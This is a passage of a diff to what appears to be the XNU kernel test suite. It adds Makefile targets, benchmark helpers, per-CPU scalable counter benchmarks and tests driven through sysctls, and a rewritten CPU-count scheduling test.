-endif - ioconnectasyncmethod_57641955: OTHER_LDFLAGS += -framework IOKit ifeq ($(PLATFORM),BridgeOS) @@ -630,4 +659,52 @@ endif test_sysctl_kern_procargs_25397314: OTHER_LDFLAGS += -framework Foundation -ldarwintest_utils +INCLUDED_TEST_SOURCE_DIRS += counter + +EXCLUDED_SOURCES += counter/common.c +counter/counter: OTHER_CFLAGS += counter/common.c test_utils.c +counter/counter: OTHER_LDFLAGS += -ldarwintest_utils -ldarwintest + +counter/benchmark: counter/benchmark.c + mkdir -p $(SYMROOT)/counter + $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/$@ + env CODESIGN_ALLOCATE=$(CODESIGN_ALLOCATE) $(CODESIGN) --force --sign - --timestamp=none $(SYMROOT)/$@; + +counter/benchmark: OTHER_CFLAGS += counter/common.c benchmark/helpers.c + +install-counter/benchmark: counter/benchmark + mkdir -p $(INSTALLDIR)/counter + cp $(SYMROOT)/counter/benchmark $(INSTALLDIR)/counter/ + +counter/benchmark_benchrun: + mkdir -p $(SYMROOT)/counter + cp $(SRCROOT)/counter/benchmark.lua $(SYMROOT)/counter/benchmark.lua + chmod +x $(SYMROOT)/counter/benchmark.lua + +install-counter/benchmark_benchrun: counter/benchmark_benchrun + mkdir -p $(INSTALLDIR)/counter + cp $(SYMROOT)/counter/benchmark.lua $(INSTALLDIR)/counter/ + chmod +x $(INSTALLDIR)/counter/benchmark.lua + +CUSTOM_TARGETS += counter/benchmark counter/benchmark_benchrun +EXCLUDED_SOURCES += counter/benchmark.c + +ifneq ($(PLATFORM),MacOSX) +EXCLUDED_SOURCES += vm/page_size_globals.c +else +vm/page_size_globals: INVALID_ARCHS = arm64 arm64e +endif + +INCLUDED_TEST_SOURCE_DIRS += lockf_uaf_poc + include $(DEVELOPER_DIR)/AppleInternal/Makefiles/darwintest/Makefile.targets + +trial_experiments: CODE_SIGN_ENTITLEMENTS = trial_experiments.entitlements +trial_experiments: OTHER_CFLAGS += -DENTITLED=1 test_utils.c drop_priv.c +trial_experiments: trial_experiments.c + $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/$@ + env CODESIGN_ALLOCATE=$(CODESIGN_ALLOCATE) $(CODESIGN) --force --sign - --timestamp=none --entitlements $(CODE_SIGN_ENTITLEMENTS) $(SYMROOT)/$@; + +trial_experiments_unentitled: OTHER_CFLAGS += drop_priv.c test_utils.c +trial_experiments_unentitled: trial_experiments.c + $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/$@ diff --git a/tests/atm_diagnostic_flag_entitled.c b/tests/atm_diagnostic_flag_entitled.c index 30235c37b..329f7f7f6 100644 --- a/tests/atm_diagnostic_flag_entitled.c +++ b/tests/atm_diagnostic_flag_entitled.c @@ -3,6 +3,8 @@ #include #include +#include "drop_priv.h" + T_GLOBAL_META(T_META_NAMESPACE("xnu.debugging")); /* @@ -11,8 +13,6 @@ T_GLOBAL_META(T_META_NAMESPACE("xnu.debugging")); */ #define LIBTRACE_PRIVATE_DATA 0x01000000 -extern void drop_priv(void); - static bool _needs_reset; static uint32_t _original; diff --git a/tests/benchmark/helpers.c b/tests/benchmark/helpers.c new file mode 100644 index 000000000..37ed76625 --- /dev/null +++ b/tests/benchmark/helpers.c @@ -0,0 +1,84 @@ +#include +#include +#include +#include +#include +#include +#include + +#include + +#include "benchmark/helpers.h" + +#define K_CTIME_BUFFER_LEN 26 +void +benchmark_log(bool verbose, const char *restrict fmt, ...) +{ + time_t now; + char time_buffer[K_CTIME_BUFFER_LEN]; + struct tm local_time; + va_list args; + if (verbose) { + strncpy(time_buffer, "UNKNOWN", K_CTIME_BUFFER_LEN); + + now = time(NULL); + if (now != -1) { + struct tm* ret = localtime_r(&now, &local_time); + if (ret == &local_time) { + snprintf(time_buffer, K_CTIME_BUFFER_LEN, + "%.2d/%.2d/%.2d %.2d:%.2d:%.2d", + local_time.tm_mon + 1, local_time.tm_mday, + local_time.tm_year + 1900, + local_time.tm_hour, local_time.tm_min, + local_time.tm_sec); + } + } + + printf("%s: ", time_buffer); + va_start(args, fmt); + vprintf(fmt, args); + fflush(stdout); + } +} + +uint64_t +timespec_difference_us(const struct timespec* a, const struct timespec* b) +{ + assert(a->tv_sec >= b->tv_sec || a->tv_nsec >= b->tv_nsec); + long seconds_elapsed = a->tv_sec - b->tv_sec; + uint64_t nsec_elapsed; + if (b->tv_nsec > a->tv_nsec) { + seconds_elapsed--; + nsec_elapsed = kNumNanosecondsInSecond - (uint64_t) (b->tv_nsec - a->tv_nsec); + } else { + nsec_elapsed = (uint64_t) (a->tv_nsec - b->tv_nsec); + } + return (uint64_t) seconds_elapsed * kNumMicrosecondsInSecond + nsec_elapsed / kNumNanosecondsInMicrosecond; +} + +unsigned char * +mmap_buffer(size_t memsize) +{ + int fd = -1; + unsigned char* addr = (unsigned char *)mmap(NULL, memsize, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, + fd, 0); + if ((void*) addr == MAP_FAILED) { + fprintf(stderr, "Unable to mmap a memory object: %s\n", strerror(errno)); + exit(2); + } + return addr; +} + +int +get_ncpu(void) +{ + int ncpu; + size_t length = sizeof(ncpu); + + int ret = sysctlbyname("hw.ncpu", &ncpu, &length, NULL, 0); + if (ret == -1) { + fprintf(stderr, "failed to query hw.ncpu"); + exit(1); + } + return ncpu; +} diff --git a/tests/benchmark/helpers.h b/tests/benchmark/helpers.h new file mode 100644 index 000000000..12746bcd2 --- /dev/null +++ b/tests/benchmark/helpers.h @@ -0,0 +1,38 @@ +#ifndef BENCHMARK_PERF_HELPERS_H +#define BENCHMARK_PERF_HELPERS_H + +/* + * Utility functions and constants used by perf tests. + */ +#include +#include +#include + +/* + * mmap an anonymous chunk of memory. + */ +unsigned char *mmap_buffer(size_t size); +/* + * Returns a - b in microseconds. + * NB: a must be >= b + */ +uint64_t timespec_difference_us(const struct timespec* a, const struct timespec* b); +/* + * Print the message to stdout along with the current time. + * Also flushes stdout so that the log can help detect hangs. Don't call + * this function from within the measured portion of the benchmark as it will + * pollute your measurement. + * + * NB: Will only log if verbose == true. + */ +void benchmark_log(bool verbose, const char *restrict fmt, ...) __attribute__((format(printf, 2, 3))); + +static const uint64_t kNumMicrosecondsInSecond = 1000UL * 1000; +static const uint64_t kNumNanosecondsInMicrosecond = 1000UL; +static const uint64_t kNumNanosecondsInSecond = kNumNanosecondsInMicrosecond * kNumMicrosecondsInSecond; +/* Get a (wall-time) timestamp in nanoseconds */ +#define current_timestamp_ns() (clock_gettime_nsec_np(CLOCK_MONOTONIC_RAW)); + +int get_ncpu(void); + +#endif /* !defined(BENCHMARK_PERF_HELPERS_H) */ diff --git a/tests/counter/benchmark.c b/tests/counter/benchmark.c new file mode 100644 index 000000000..32471d304 --- /dev/null +++ b/tests/counter/benchmark.c @@ -0,0 +1,243 @@ +/* Per-cpu counter microbenchmarks. */ + +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include + +#include "benchmark/helpers.h" +#include "counter/common.h" + +typedef enum test_variant { + VARIANT_SCALABLE_COUNTER, + VARIANT_ATOMIC, + VARIANT_RACY +} test_variant_t; + +static const char* kScalableCounterArgument = "scalable"; +static const char* kAtomicCounterArgument = "atomic"; +static const char* kRacyCounterArgument = "racy"; + +static const int64_t kChunkSize = 100000000; + +/* Arguments parsed from the command line */ +typedef struct test_args { + size_t n_threads; + unsigned long long num_writes; + test_variant_t variant; + bool verbose; +} test_args_t; + +typedef struct { + char _padding1[128]; + atomic_bool tg_test_start; + atomic_ullong tg_num_writes_remaining; + atomic_ullong tg_threads_ready; + test_args_t tg_args; + uint64_t tg_start_time; + uint64_t tg_end_time; + uint64_t tg_start_value; + uint64_t tg_end_value; + char _padding2[128]; +} test_globals_t; + +static void parse_arguments(int argc, char** argv, test_args_t *args); +static const char *get_sysctl_name_for_test_variant(test_variant_t variant); +static void *writer(void *); +static uint64_t counter_read(test_variant_t); + +int +main(int argc, char** argv) +{ + test_globals_t globals = {0}; + pthread_t* threads = NULL; + int ret; + int is_development_kernel; + size_t is_development_kernel_size = sizeof(is_development_kernel); + pthread_attr_t pthread_attrs; + uint64_t duration, writes_stored; + double writes_per_second; + double loss; + + if (sysctlbyname("kern.development", &is_development_kernel, + &is_development_kernel_size, NULL, 0) != 0 || !is_development_kernel) { + fprintf(stderr, "%s requires the development kernel\n", argv[0]); + exit(1); + } + + parse_arguments(argc, argv, &(globals.tg_args)); + atomic_store(&(globals.tg_num_writes_remaining), globals.tg_args.num_writes); + + threads = malloc(sizeof(pthread_t) * globals.tg_args.n_threads); + assert(threads); + ret = pthread_attr_init(&pthread_attrs); + assert(ret == 0); + ret = init_scalable_counter_test(); + assert(ret == 0); + globals.tg_start_value = counter_read(globals.tg_args.variant); + for (size_t i = 0; i < globals.tg_args.n_threads; i++) { + ret = pthread_create(threads + i, &pthread_attrs, writer, &globals); + assert(ret == 0); + } + for (size_t i = 0; i < globals.tg_args.n_threads; i++) { + ret = pthread_join(threads[i], NULL); + assert(ret == 0); + } + ret = fini_scalable_counter_test(); + assert(ret == 0); + globals.tg_end_value = counter_read(globals.tg_args.variant); + + duration = globals.tg_end_time - globals.tg_start_time; + printf("-----Results-----\n"); + printf("rate,loss\n"); + writes_per_second = globals.tg_args.num_writes / ((double) duration / kNumNanosecondsInSecond); + writes_stored = globals.tg_end_value - globals.tg_start_value; + loss = (1.0 - ((double) writes_stored / globals.tg_args.num_writes)) * 100; + printf("%.4f,%.4f\n", writes_per_second, loss); + return 0; +} + +static void * +writer(void *arg) +{ + int ret; + const char* sysctl_name; + test_globals_t *globals = arg; + int64_t value = kChunkSize; + //size_t size = sizeof(value); + + sysctl_name = get_sysctl_name_for_test_variant(globals->tg_args.variant); + assert(sysctl_name != NULL); + + if (atomic_fetch_add(&(globals->tg_threads_ready), 1) == globals->tg_args.n_threads - 1) { + globals->tg_start_time = current_timestamp_ns(); + atomic_store(&globals->tg_test_start, true); + } + while (!atomic_load(&(globals->tg_test_start))) { + ; + } + + while (true) { + unsigned long long remaining = atomic_fetch_sub(&(globals->tg_num_writes_remaining), value); + if (remaining < kChunkSize || remaining > globals->tg_args.num_writes) { + break; + } + + ret = sysctlbyname(sysctl_name, NULL, NULL, &value, sizeof(value)); + assert(ret == 0); + if (remaining == kChunkSize || remaining - kChunkSize > remaining) { + break; + } + } + + if (atomic_fetch_sub(&(globals->tg_threads_ready), 1) == 1) { + globals->tg_end_time = current_timestamp_ns(); + } + + return NULL; +} + +static const char* +get_sysctl_name_for_test_variant(test_variant_t variant) +{ + switch (variant) { + case VARIANT_SCALABLE_COUNTER: + return "kern.scalable_counter_write_benchmark"; + case VARIANT_ATOMIC: + return "kern.scalable_counter_atomic_counter_write_benchmark"; + case VARIANT_RACY: + return "kern.scalable_counter_racy_counter_benchmark"; + default: + return NULL; + } +} + +static const char* +get_sysctl_load_name_for_test_variant(test_variant_t variant) +{ + switch (variant) { + case VARIANT_SCALABLE_COUNTER: + return "kern.scalable_counter_test_load"; + case VARIANT_ATOMIC: + return "kern.scalable_counter_atomic_counter_load"; + case VARIANT_RACY: + return "kern.scalable_counter_racy_counter_load"; + default: + return NULL; + } +} + +static uint64_t +counter_read(test_variant_t variant) +{ + const char *sysctl_name = get_sysctl_load_name_for_test_variant(variant); + int result; + uint64_t value; + size_t size = sizeof(value); + result = sysctlbyname(sysctl_name, &value, &size, NULL, 0); + assert(result == 0); + return value; +} + +static void +print_help(char** argv) +{ + fprintf(stderr, "%s: [-v] num_writes num_threads\n", argv[0]); + fprintf(stderr, "\ntest variants:\n"); + fprintf(stderr, " %s Benchmark scalable counters.\n", kScalableCounterArgument); + fprintf(stderr, " %s Benchmark single atomic counter.\n", kAtomicCounterArgument); + fprintf(stderr, " %s Benchmark racy counter.\n", kRacyCounterArgument); +} + +static void +parse_arguments(int argc, char** argv, test_args_t *args) +{ + int current_argument = 1; + memset(args, 0, sizeof(test_args_t)); + if (argc < 4 || argc > 6) { + print_help(argv); + exit(1); + } + if (argv[current_argument][0] == '-') { + if (strcmp(argv[current_argument], "-v") == 0) { + args->verbose = true; + } else { + fprintf(stderr, "Unknown argument %s\n", argv[current_argument]); + print_help(argv); + exit(1); + } + current_argument++; + } + if (strncasecmp(argv[current_argument], kScalableCounterArgument, strlen(kScalableCounterArgument)) == 0) { + args->variant = VARIANT_SCALABLE_COUNTER; + } else if (strncasecmp(argv[current_argument], kAtomicCounterArgument, strlen(kAtomicCounterArgument)) == 0) { + args->variant = VARIANT_ATOMIC; + } else if (strncasecmp(argv[current_argument], kRacyCounterArgument, strlen(kRacyCounterArgument)) == 0) { + args->variant = VARIANT_RACY; + } else { + print_help(argv); + exit(1); + } + current_argument++; + + long num_writes = strtol(argv[current_argument++], NULL, 10); + if (num_writes == 0) { + print_help(argv); + exit(1); + } + long num_cores = strtol(argv[current_argument++], NULL, 10); + if (num_cores == 0) { + print_help(argv); + exit(1); + } + assert(num_cores > 0 && num_cores <= get_ncpu()); + args->n_threads = (unsigned int) num_cores; + args->num_writes = (unsigned long long) num_writes; +} diff --git a/tests/counter/benchmark.lua b/tests/counter/benchmark.lua new file mode 100644 index 000000000..2759e87e5 --- /dev/null +++ b/tests/counter/benchmark.lua @@ -0,0 +1,107 @@ +#!/usr/local/bin/recon +require 'strict' + +local benchrun = require 'benchrun' +local perfdata = require 'perfdata' +local sysctl = require 'sysctl' +local csv = require 'csv' + +local kDefaultNumWrites = 10000000000 + +local benchmark = benchrun.new { + name = 'xnu.per_cpu_counter', + version = 1, + arg = arg, + modify_argparser = function(parser) + parser:argument{ + name = 'path', + description = 'Path to benchmark binary' + } + parser:option{ + name = '--cpu-workers', + description = 'Number of cpu workers' + } + parser:flag{ + name = '--through-max-workers', + description = 'Run benchmark for [1..n] cpu workers' + } + parser:flag{ + name = '--through-max-workers-fast', + description = 'Run benchmark for [1..2] and each power of four value in [4..n] cpu workers' + } + parser:option { + name = "--num-writes", + description = "number of writes", + default = kDefaultNumWrites + } + parser:option{ + name = '--variant', + description = 'Which benchmark variant to run (scalable, atomic, or racy)', + default = 'scalable', + choices = {"scalable", "atomic", "racy"} + } + end +} + +assert(benchmark.opt.path, "No path supplied for fault throughput binary") + +local ncpus, err = sysctl('hw.logicalcpu_max') +assert(ncpus > 0, 'invalid number of logical cpus') +local cpu_workers = tonumber(benchmark.opt.cpu_workers) or ncpus + +local writes_per_second = perfdata.unit.custom('writes/sec') +local tests = {} + +function QueueTest(num_cores) + table.insert(tests, { + path = benchmark.opt.path, + num_cores = num_cores, + }) +end + +if benchmark.opt.through_max_workers then + for i = 1, cpu_workers do + QueueTest(i) + end +elseif benchmark.opt.through_max_workers_fast then + local i = 1 + while i <= cpu_workers do + QueueTest(i) + -- Always do a run with two threads to see what the first part of + -- the scaling curve looks like + -- (and to measure perf on dual core systems). + if i == 1 and cpu_workers >= 2 then + QueueTest(i + 1) + end + i = i * 4 + end +else + QueueTest(cpu_workers) +end + +for _, test in ipairs(tests) do + local args = {test.path, benchmark.opt.variant, benchmark.opt.num_writes, test.num_cores, + echo = true} + for out in benchmark:run(args) do + local result = out:match("-----Results-----\n(.*)") + benchmark:assert(result, "Unable to find result data in output") + local data = csv.openstring(result, {header = true}) + for field in data:lines() do + for k, v in pairs(field) do + local unit = writes_per_second + local larger_better = true + if k == "loss" then + unit = percentage + larger_better = false + end + benchmark.writer:add_value(k, unit, tonumber(v), { + [perfdata.larger_better] = larger_better, + threads = test.num_cores, + variant = benchmark.opt.variant + }) + end + end + end +end + +benchmark:finish() diff --git a/tests/counter/common.c b/tests/counter/common.c new file mode 100644 index 000000000..f759f29cc --- /dev/null +++ b/tests/counter/common.c @@ -0,0 +1,24 @@ +#include +#include +#include + +#include "counter/common.h" + +int +init_scalable_counter_test() +{ + kern_return_t result; + int value = 1; + + result = sysctlbyname("kern.scalable_counter_test_start", NULL, NULL, &value, sizeof(value)); + return result; +} + +int +fini_scalable_counter_test() +{ + kern_return_t result; + int value = 1; + result = sysctlbyname("kern.scalable_counter_test_finish", NULL, NULL, &value, sizeof(value)); + return result; +} diff --git a/tests/counter/common.h b/tests/counter/common.h new file mode 100644 index 000000000..eaf4daa68 --- /dev/null +++ b/tests/counter/common.h @@ -0,0 +1,7 @@ +#ifndef _COUNTER_COMMON_H +#define _COUNTER_COMMON_H + +int init_scalable_counter_test(void); +int fini_scalable_counter_test(void); + +#endif /* !defined(_COUNTER_COMMON_H) */ diff --git a/tests/counter/counter.c b/tests/counter/counter.c new file mode 100644 index 000000000..8000b0822 --- /dev/null +++ b/tests/counter/counter.c @@ -0,0 +1,181 @@ +#include +#include + +#include +#include + +#include "counter/common.h" +#include "test_utils.h" + +static unsigned int ncpu(void); + +static uint64_t +sysctl_read(const char *name) +{ + int result; + uint64_t value; + size_t size = sizeof(value); + result = sysctlbyname(name, &value, &size, NULL, 0); + T_QUIET; T_ASSERT_POSIX_SUCCESS(result, "Read from %s", name); + return value; +} + +static void +sysctl_write(const char* name, int64_t amount) +{ + kern_return_t result; + result = sysctlbyname(name, NULL, NULL, &amount, sizeof(int64_t)); + T_QUIET; T_ASSERT_POSIX_SUCCESS(result, "Write to %s", name); +} + +static void +scalable_counter_add(int64_t amount) +{ + sysctl_write("kern.scalable_counter_test_add", amount); +} + +static void +static_scalable_counter_add(int64_t amount) +{ + sysctl_write("kern.static_scalable_counter_test_add", amount); +} + +static int64_t +scalable_counter_load(void) +{ + return (int64_t) sysctl_read("kern.scalable_counter_test_load"); +} + +static int64_t +static_scalable_counter_load(void) +{ + return (int64_t) sysctl_read("kern.static_scalable_counter_test_load"); +} + +/* + * A background thread that bangs on the percpu counter and then exits. + * @param num_iterations How many times to bang on the counter. Each iteration makes the counter + * bigger by 100. + */ +static void* +background_scalable_counter_thread(void* num_iterations_ptr) +{ + int64_t i, num_iterations; + num_iterations = (int64_t)(num_iterations_ptr); + for (i = 0; i < num_iterations; i++) { + scalable_counter_add(-25); + scalable_counter_add(75); + scalable_counter_add(-100); + scalable_counter_add(150); + } + atomic_thread_fence(memory_order_release); + return 0; +} + +static +void +darwin_test_fini_scalable_counter_test() +{ + int ret = fini_scalable_counter_test(); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "fini_scalable_counter_test"); +} + +static +void +darwin_test_setup(void) +{ + T_SETUPBEGIN; + int dev_kernel = is_development_kernel(); + T_QUIET; T_ASSERT_POSIX_SUCCESS(dev_kernel, "sysctlbyname kern.development"); + if (is_development_kernel() != 1) { + T_SKIP("Skipping test on non development kernel."); + } + init_scalable_counter_test(); + T_SETUPEND; + T_ATEND(darwin_test_fini_scalable_counter_test); +} + +T_DECL(test_scalable_counters_single_threaded, "Test single threaded operations on scalable_counters", T_META_ASROOT(true)) +{ + static int64_t kNumIterations = 100, i, expected_value = 0; + darwin_test_setup(); + T_QUIET; T_EXPECT_EQ(scalable_counter_load(), 0LL, "Counter starts at zero"); + + /* Simple add, subtract, and read */ + scalable_counter_add(1); + T_QUIET; T_EXPECT_EQ(scalable_counter_load(), 1LL, "0 + 1 == 1"); + scalable_counter_add(-1); + T_QUIET; T_EXPECT_EQ(scalable_counter_load(), 0LL, "1 - 1 == 0"); + for (i = 0; i < kNumIterations; i++) { + scalable_counter_add(i); + expected_value += i; + } + for (i = 0; i < kNumIterations / 2; i++) { + scalable_counter_add(-i); + expected_value -= i; + } + T_QUIET; T_EXPECT_EQ(scalable_counter_load(), expected_value, "Counter value is correct."); + T_END; +} + +T_DECL(test_static_counter, "Test staticly declared counter", T_META_ASROOT(true)) +{ + static size_t kNumIterations = 100; + int64_t start_value; + darwin_test_setup(); + start_value = static_scalable_counter_load(); + for (size_t i = 0; i < kNumIterations; i++) { + static_scalable_counter_add(1); + } + T_QUIET; T_EXPECT_EQ(static_scalable_counter_load(), (long long) kNumIterations + start_value, "Counter value is correct"); + T_END; +} + +T_DECL(test_scalable_counters_multithreaded, "Test multi-threaded operations on scalable_counters", T_META_ASROOT(true)) +{ + unsigned int kNumThreads = ncpu() * 5; + int ret; + int64_t i; + pthread_attr_t pthread_attr; + pthread_t *threads; + + darwin_test_setup(); + + threads = malloc(sizeof(pthread_t) * kNumThreads); + T_QUIET; T_ASSERT_NOTNULL(threads, "Out of memory"); + + ret = pthread_attr_init(&pthread_attr); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_attr_init"); + + int64_t expected_value = 0; + for (i = 0; i < kNumThreads; i++) { + ret = pthread_create(&threads[i], &pthread_attr, background_scalable_counter_thread, (void*)(i)); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_create"); + expected_value += 100 * i; + } + + for (i = 0; i < kNumThreads; i++) { + void *exit_code; + ret = pthread_join(threads[i], &exit_code); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_join"); + T_QUIET; T_ASSERT_EQ((ptrdiff_t) exit_code, (ptrdiff_t) 0, "Background thread exited sucessfully."); + } + atomic_thread_fence(memory_order_acquire); + + T_QUIET; T_EXPECT_EQ(scalable_counter_load(), expected_value, "Counter value is correct."); + + ret = pthread_attr_destroy(&pthread_attr); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_attr_destroy"); + free(threads); +} + +static unsigned int +ncpu() +{ + kern_return_t result; + int ncpu; + size_t size = sizeof(ncpu); + result = sysctlbyname("hw.ncpu", &ncpu, &size, NULL, 0); + T_QUIET; T_ASSERT_MACH_SUCCESS(result, "hw.npu"); + return (unsigned int) ncpu; +} diff --git a/tests/cpucount.c b/tests/cpucount.c index 24a2c156c..0906ab7fc 100644 --- a/tests/cpucount.c +++ b/tests/cpucount.c @@ -2,284 +2,190 @@ * Test to validate that we can schedule threads on all hw.ncpus cores according to _os_cpu_number * * + * * * xcrun -sdk macosx.internal clang -o cpucount cpucount.c -ldarwintest -g -Weverything * xcrun -sdk iphoneos.internal clang -arch arm64 -o cpucount-ios cpucount.c -ldarwintest -g -Weverything + * xcrun -sdk macosx.internal clang -o cpucount cpucount.c -ldarwintest -arch arm64e -Weverything */ #include #include #include -#include -#include #include -#include #include -#include -#include -#include #include -#include +#include +#include #include #include #include /* private header for _os_cpu_number */ -T_GLOBAL_META(T_META_RUN_CONCURRENTLY(true)); +T_GLOBAL_META( + T_META_RUN_CONCURRENTLY(false), + T_META_BOOTARGS_SET("enable_skstb=1"), + T_META_CHECK_LEAKS(false), + T_META_ASROOT(true), + T_META_ALL_VALID_ARCHS(true) + ); -/* const variables aren't constants, but enums are */ -enum { max_threads = 40 }; +#define KERNEL_BOOTARGS_MAX_SIZE 1024 +static char kernel_bootargs[KERNEL_BOOTARGS_MAX_SIZE]; -#define CACHE_ALIGNED __attribute__((aligned(128))) - -static _Atomic CACHE_ALIGNED uint64_t g_ready_threads = 0; - -static _Atomic CACHE_ALIGNED bool g_cpu_seen[max_threads]; - -static _Atomic CACHE_ALIGNED bool g_bail = false; - -static uint32_t g_threads; /* set by sysctl hw.ncpu */ - -static uint64_t g_spin_ms = 50; /* it takes ~50ms of spinning for CLPC to deign to give us all cores */ - -/* - * sometimes pageout scan can eat all of CPU 0 long enough to fail the test, - * so we run the test at RT priority - */ -static uint32_t g_thread_pri = 97; - -/* - * add in some extra low-pri threads to convince the amp scheduler to use E-cores consistently - * works around - */ -static uint32_t g_spin_threads = 2; -static uint32_t g_spin_threads_pri = 20; - -static semaphore_t g_readysem, g_go_sem; +#define KERNEL_VERSION_MAX_SIZE 1024 +static char kernel_version[KERNEL_VERSION_MAX_SIZE]; static mach_timebase_info_data_t timebase_info; static uint64_t -nanos_to_abs(uint64_t nanos) +abs_to_nanos(uint64_t abs) { - return nanos * timebase_info.denom / timebase_info.numer; + return abs * timebase_info.numer / timebase_info.denom; } -static void -set_realtime(pthread_t thread) -{ - kern_return_t kr; - thread_time_constraint_policy_data_t pol; - - mach_port_t target_thread = pthread_mach_thread_np(thread); - T_QUIET; T_ASSERT_NOTNULL(target_thread, "pthread_mach_thread_np"); - - /* 1s 100ms 10ms */ - pol.period = (uint32_t)nanos_to_abs(1000000000); - pol.constraint = (uint32_t)nanos_to_abs(100000000); - pol.computation = (uint32_t)nanos_to_abs(10000000); - - pol.preemptible = 0; /* Ignored by OS */ - kr = thread_policy_set(target_thread, THREAD_TIME_CONSTRAINT_POLICY, (thread_policy_t) &pol, - THREAD_TIME_CONSTRAINT_POLICY_COUNT); - T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "thread_policy_set(THREAD_TIME_CONSTRAINT_POLICY)"); -} - -static pthread_t -create_thread(void *(*start_routine)(void *), uint32_t priority) +static int32_t +get_csw_count() { + struct proc_taskinfo taskinfo; int rv; - pthread_t new_thread; - pthread_attr_t attr; - - struct sched_param param = { .sched_priority = (int)priority }; - - rv = pthread_attr_init(&attr); - T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_attr_init"); - - rv = pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_DETACHED); - T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_attr_setdetachstate"); - - rv = pthread_attr_setschedparam(&attr, ¶m); - T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_attr_setschedparam"); - - rv = pthread_create(&new_thread, &attr, start_routine, NULL); - T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_create"); - - if (priority == 97) { - set_realtime(new_thread); - } - rv = pthread_attr_destroy(&attr); - T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_attr_destroy"); + rv = proc_pidinfo(getpid(), PROC_PIDTASKINFO, 0, &taskinfo, sizeof(taskinfo)); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "PROC_PIDTASKINFO"); - return new_thread; + return taskinfo.pti_csw; } -static void * -thread_fn(__unused void *arg) +// noinline hopefully keeps the optimizer from hoisting it out of the loop +// until rdar://68253516 is fixed. +__attribute__((noinline)) +static uint32_t +fixed_os_cpu_number(void) { - T_QUIET; T_EXPECT_TRUE(true, "initialize darwintest on this thread"); - - kern_return_t kr; - - kr = semaphore_wait_signal(g_go_sem, g_readysem); - T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait_signal"); + uint32_t cpu_number = _os_cpu_number(); - /* atomic inc to say hello */ - g_ready_threads++; + return cpu_number; +} - uint64_t timeout = nanos_to_abs(g_spin_ms * NSEC_PER_MSEC) + mach_absolute_time(); - /* - * spin to force the other threads to spread out across the cores - * may take some time if cores are masked and CLPC needs to warm up to unmask them - */ - while (g_ready_threads < g_threads && mach_absolute_time() < timeout) { - ; - } +T_DECL(count_cpus, "Tests we can schedule bound threads on all hw.ncpus cores and that _os_cpu_number matches") +{ + int rv; - T_QUIET; T_ASSERT_GE(timeout, mach_absolute_time(), "waiting for all threads took too long"); + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); - timeout = nanos_to_abs(g_spin_ms * NSEC_PER_MSEC) + mach_absolute_time(); + /* Validate what kind of kernel we're on */ + size_t kernel_version_size = sizeof(kernel_version); + rv = sysctlbyname("kern.version", kernel_version, &kernel_version_size, NULL, 0); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "kern.version"); - int iteration = 0; - uint32_t cpunum = 0; + T_LOG("kern.version: %s\n", kernel_version); - /* search for new CPUs for the duration */ - while (mach_absolute_time() < timeout) { - cpunum = _os_cpu_number(); + /* Double check that darwintest set the boot arg we requested */ + size_t kernel_bootargs_size = sizeof(kernel_bootargs); + rv = sysctlbyname("kern.bootargs", kernel_bootargs, &kernel_bootargs_size, NULL, 0); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "kern.bootargs"); - assert(cpunum < max_threads); + T_LOG("kern.bootargs: %s\n", kernel_bootargs); - g_cpu_seen[cpunum] = true; + if (NULL == strstr(kernel_bootargs, "enable_skstb=1")) { + T_FAIL("enable_skstb=1 boot-arg is missing"); + } - if (iteration++ % 10000) { - uint32_t cpus_seen = 0; + kern_return_t kr; + kr = mach_timebase_info(&timebase_info); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_timebase_info"); - for (uint32_t i = 0; i < g_threads; i++) { - if (g_cpu_seen[i]) { - cpus_seen++; - } - } + int bound_cpu_out = 0; + size_t bound_cpu_out_size = sizeof(bound_cpu_out); + rv = sysctlbyname("kern.sched_thread_bind_cpu", &bound_cpu_out, &bound_cpu_out_size, NULL, 0); - /* bail out early if we saw all CPUs */ - if (cpus_seen == g_threads) { - break; - } + if (rv == -1) { + if (errno == ENOENT) { + T_FAIL("kern.sched_thread_bind_cpu doesn't exist, must set enable_skstb=1 boot-arg on development kernel"); + } + if (errno == EPERM) { + T_FAIL("must run as root"); } } - g_bail = true; + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "read kern.sched_thread_bind_cpu"); + T_QUIET; T_ASSERT_EQ(bound_cpu_out, -1, "kern.sched_thread_bind_cpu should exist, start unbound"); - printf("thread cpunum: %d\n", cpunum); + struct sched_param param = {.sched_priority = 63}; - kr = semaphore_wait_signal(g_go_sem, g_readysem); - T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait_signal"); + rv = pthread_setschedparam(pthread_self(), SCHED_FIFO, ¶m); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_setschedparam"); - return NULL; -} + uint32_t sysctl_ncpu = 0; + size_t ncpu_size = sizeof(sysctl_ncpu); + rv = sysctlbyname("hw.ncpu", &sysctl_ncpu, 